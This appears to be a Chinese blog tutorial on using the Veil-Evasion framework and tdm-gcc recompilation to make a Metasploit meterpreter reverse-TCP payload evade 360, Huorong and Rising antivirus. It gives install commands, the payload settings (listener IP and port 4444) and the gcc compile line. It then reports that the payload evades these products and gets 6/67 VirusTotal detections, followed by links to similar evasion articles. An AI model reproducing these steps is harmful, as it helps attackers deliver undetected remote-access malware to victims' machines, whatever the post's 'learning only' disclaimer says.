Veil+tdm-gcc免杀360火绒瑞星

已于 2022-04-20 17:41:20 修改
阅读量1.2k 收藏 10
点赞数 2
分类专栏: 木马免杀 文章标签: 系统安全 安全
于 2021-08-27 12:32:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/119947893
版权

Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。

0x00 Veil安装

我是直接在kail下面安装的

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

0x01 Veil使用

veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。

我们一般选择Evasion

Veil>: use Evasion 
# use <id | name> 进入或使用当前可以使用的tool或者payload

在这里插入图片描述
列出payload

Veil/Evasion>: list 
# list 列出当前可以使用的tool或者payload

在这里插入图片描述
选择使用 c/meterpreter/rev_tcp.py

Veil/Evasion>: use 7
#设置 需要IP和端口
[c/meterpreter/rev_tcp>>]: set lhost 192.168.190.131
[c/meterpreter/rev_tcp>>]: set lport 4444
#生产payload
[c/meterpreter/rev_tcp>>]: generate 
#payload命名C01
[>] Please enter the base name for output files (default is payload): C01

在这里插入图片描述

源码: /var/lib/veil/output/source/C01.c
生成的exe :/var/lib/veil/output/compiled/C01.exe

0x02 Veil原生C01.exe 执行测试

说明:
192.168.190.1 安装瑞星和火绒
在这里插入图片描述
在这里插入图片描述

192.168.190.129安装360杀毒和360安全卫士
在这里插入图片描述
在这里插入图片描述

开启msf,设置好监听
在这里插入图片描述
192.168.190.1上点击下载瞬间被火绒检测报毒
在这里插入图片描述

192.168.190.129上点击下载并检测无异常
在这里插入图片描述
尝试执行
成功上线了一会后被杀,躲过了静态,没躲过动态
存活时间短
被火绒查杀

0x03 tdm-gcc

tdm-gcc下载地址:https://jmeubank.github.io/tdm-gcc/

TDM-GCC是一款适用于windows平台的gcc编译工具,主要适用于c语言开发者使用,软件集合了GCC 工具集中最新的稳定发行版本,包含了丰富实用的开发工具供开发者使用,安装后就可以正常使用

0x04 使用tdm-gcc编译生成 C02.exe 执行测试

/var/lib/veil/output/source/C01.c编译生成C02.exe

gcc C02.c -o C02.exe -lwsock32

在 192.168.190.129上执行
在这里插入图片描述
执行C02.exe成功上线
在这里插入图片描述
将C02.exe复制到192.168.190.1
瑞星和火绒均未检测出风险
在这里插入图片描述

执行
成功上线
在这里插入图片描述
在这里插入图片描述
virustotal.com中6/67个报毒
在这里插入图片描述

综上所诉,Veil+tdm-gcc达到的免杀效果还是不错的

仅用于学习交流,不得用于非法用途
如侵权请私聊博主删文

半只特立独行的猪
关注
专栏目录
Veil-Evasion免杀
afei001
04-08 512
Veil-Evasion简介 Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多数的杀软。 Veil-Evasion并没有集成在kali,配置sources.list,可直接apt-get。 Github项目地址:https://github.com/Veil-Framework/Veil-Evas...
免杀工具--veil-evasion
11-21
这个东西下了好久的,用过都知道GitHub下载死慢的,就分享出来赚点积分吧
免杀Veil-evasion
分享学习网络的点点滴滴
11-22 535
● 属于Veil-framework框架的一部分● 由Python语言编写● 用于自动生成免杀payload○ 集成msf payload,支持自定义payload○ 集成各种注入技术○ 集成各种第三方工具○ 继承各种开发打包运行环境。
Cobalt Strike Veil 免杀过杀软(子篇10)
yyj1781572的博客
11-23 366
Cobalt Strike Veil 免杀过杀软
免杀veil的简单使用
m0_46171781的博客
05-10 1297
一、安装veil 1.在kali中安装veil,命令为apt-get install veil-evasion -y 2.安装后,打开veil,会提示安装其他相关软件包,执行veil命令 3.所有相关软件环境安装完毕后,执行veil,可能会报错,如果报错,根据提示执行命令 /usr/share/veil/config/setup.sh --force --silent 即可 4.修复完毕后就可以正常使用了 二、使用veil 1.使用cs生成简单的payload木马 2.使用veil对木马进行加密,首先打
Cobalt Strike(十四)Veil免杀过杀软
qq_56426046的博客
09-25 383
选择payload Generator 选择Veil 不要选择 x64可能出错。—————————————————————————————————多谢梅花,伴我微吟。Veil主要用于免杀payload。输入自定义payload的字符串。选择3 自定义payload。选择Evasion逃逸。在终端下运行veil。输入generate。
全套免杀教程+免杀工具合集
最新发布
08-25
远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf 远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf 远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf 元控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf 远控免杀...
Veil-Evasion-master.zip
04-03
Veil-Evasion是一个开源的渗透测试工具,它属于Veil-Framework框架的一个核心组件。Veil-Evasion的主要目的是帮助安全研究人员和渗透测试人员创建能够绕过常见防病毒软件和安全解决方案的恶意软件payload。这个工具...
21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70)1
08-03
文章提供了之前一系列关于免杀技术的文章链接,涵盖了多种工具和技术,如msfvenom、Evasion、Veil、Venom等,供读者进一步学习和研究。 总结来说,了解和掌握HERCULES这样的免杀工具,对于理解现代网络安全攻防至关...
162.网络安全渗透测试—[Cobalt Strike系列]—[Veil免杀]
qwsn
04-20 1713
文章目录 1 Veil的使用 2 生成有效载荷payload 3 Veil免杀过程 4 测试免杀
免杀火绒
sash1mi
02-04 2350
免杀火绒 接上篇文章《免杀360全家桶》 https://blog.csdn.net/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒查杀 360查杀 6.cs上线 .
免杀veil安装
净邪的博客
08-23 1089
第一种方法: apt -y install veil /usr/share/veil/config/setup.sh --force --silent 第二种方法: 安装环境: 安装https协议、CA证书、dirmngr apt-get update apt-get install -y apt-transport-https ca-certificates apt-get install dirmngr 2.添加GPG密钥并添加更新源 curl -fsSL https://m
免杀payload生成工具veil
weixin_44225057的博客
11-23 166
指令:use info list update clean checkvt。这个时候生成了一个exe的东西 ,发送到目标主机上就可以完成攻击。please enter a command 表示登陆成功了。利用metasploit框架生成相兼容的payload工具。启动:第一次会更新一些东西,脚本 插件。还可以继续veil-version。list:可以查看payload。
c语言免杀火绒
记录学习,一起进步
11-18 746
c语言随机数异或加密免杀
使用msfvenom免杀火绒
2301_76718200的博客
11-11 981
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把杀软关闭要不然会杀掉,没有做免杀的木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
远控免杀专题(5)-Veil免杀(VT免杀率23/71)
gclome的博客
03-17 769
免杀能力一览表 几点说明: 1、下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.1...
Veil生成免杀payload 渗透win10 获取靶机shell
qq_40624810的博客
08-04 1898
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载、安装、使用 kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil 安装过程有点漫长,如果用的国内源可能会快点。 安装完成后启动Veil ...
第六章-12 使用veil免杀
划水的小白白
11-27 296
0.1 说明 本文所有内容仅仅用于信息安全方面技术交流, 请读者切勿用于其他用途!!! 0.2 Veil Veil在kali中并不自带,需要下载。命令:“ apt-get install veil ”,回车即可。 一、 启动CS 二、 启动监听 三、生成payload 生成的是一个文本文档,打开看看应该是16进制代码。 四、veil的使用 , , , , 直接输入“ 3 ”即可。 五、进行免杀 , , , , 六、模拟受害者运行 , 但是注意的是,此时的权限仅仅是adminis
绕过杀软(二)——免杀exe文件(360火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
Kali Linux安装与使用Veil-Evasion框架教程
"本文档介绍了如何在Kali Linux系统中安装和使用Veil-Evasion框架,该框架主要用于生成能够绕过常见反病毒软件的Metasploit有效载荷,以实现安全渗透测试中的免杀功能。" Veil-Evasion是针对Kali Linux的一个开源...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值